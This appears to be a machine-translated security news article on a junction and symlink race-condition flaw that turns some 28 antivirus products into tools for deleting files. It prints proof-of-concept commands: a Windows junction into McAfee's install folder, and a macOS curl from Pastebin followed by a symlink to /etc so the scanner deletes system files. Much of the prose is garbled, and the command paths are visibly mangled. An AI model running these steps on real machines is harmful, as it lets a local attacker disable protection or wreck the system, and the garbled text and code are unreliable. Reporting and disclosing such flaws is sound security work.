The researchers discovered a simple gap that existed in nearly 28 antivirus programs, allowing malware writers to run the system and separate the antivirus programs into self-destructive tools.
Errors related to improper use of folders (Windows) and system shortcuts (MacOS and Linux) and used them to perform this operation
A directory node is exclusive to Windows and can only link two directories; it cannot link files, and directories must be local to the file system.
No administrator rights are required for the use of antivirus software running on the Windows operating system.
Symbolic link Also called symbolic link, it is generally used under Linux and MacOS. Symlink is a file type that refers to another file.
In both methods, the defect uses privileged file operations to disable the antivirus software or to render the operating system unusable, etc.
Anti-virus protection is mainly performed on computers with high permissions and gets the highest level of authorization to scan all files and folders for unknown and malicious files, quarantine them and move them to an isolated environment.
Because of this type of antivirus, it is open to a range of vulnerabilities and different breed conditions. Ultimately, it enables attackers to obtain high-level privileges for vulnerable systems.
Effects and effects
It is easy to use and the experience of malware authors makes it easy to exploit this vulnerability. But it is very time and import dependent to know when to do a directory splitting or a SIM connection.
A local assailant who might try to increase the privilege might learn the right moment to exploit the privilege.
According to the report: For some of the antivirus programs we used, time was not important at all, and it was enough to specify the exploit repeat cycle several times to manipulate the antivirus software to self-destruct. One second too early or one second too late and the exploitation doesn’t work.
Window control (PoC video)
The researchers tried to use the exploitation against McAfee Endpoint Security for Windows based on their evidence, and managed to remove the EpSecApiLib.dll file.
During our tests, we were able to delete all files that are currently not in use, including the possibility of disrupting the operation of the antivirus itself, the researchers said.
rd /s /q C:UsersUserDesktopxploit
echo X5O!P%@AP[4PZX54(P^^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:UsersUserDesktopxploitEpSecApiLib.dll
rd /s /q C:UsersUserDesktopxploit
mklink /J C:UsersUserDesktopxploit C:Program Files (x86)McAfeeEndpoint SecurityEndpoint Security Platform
How Macros and Linux work (PoC Video)
The researchers used their PoC exploitation against Norton Internet Security for macros and downloaded Pastebin’s EICAR test string to bypass real-time protection, meaning the test string could not be downloaded from the official Norton website.
By downloading a test line from Pastebin, the antivirus program immediately detects it as malicious and tries to clean it up.
The researchers stated that we were able to determine an estimated time delay of 6 to 8 seconds, which allows for the appearance of a race condition that could lead to an attack symbolic link that would delete any file because the software runs as a root.
Work code Poc for MacOS
rm -rf /user/user/name/exploit; mkdir /user/user/name/exploit
curl -k https://pastebin.com/raw/jZJ6Ekzt > /user/user/name/exploit/passwd
rm -rf /user/user/name/exploit; ln -s /etc /user/name/exploit
This proof of concept also works for some Linux antivirus programs, and the researchers were able to delete important files that made up the antivirus program.
All antivirus vendors involved have been individually confirmed, and almost all of the antivirus vendors listed on this page are now fixed.
Users are advised to apply the new patch to the Respect antivirus software installed on their computer.
You can follow us on Linkedin, Twitter, Facebook to get daily news about cybersecurity and hackers.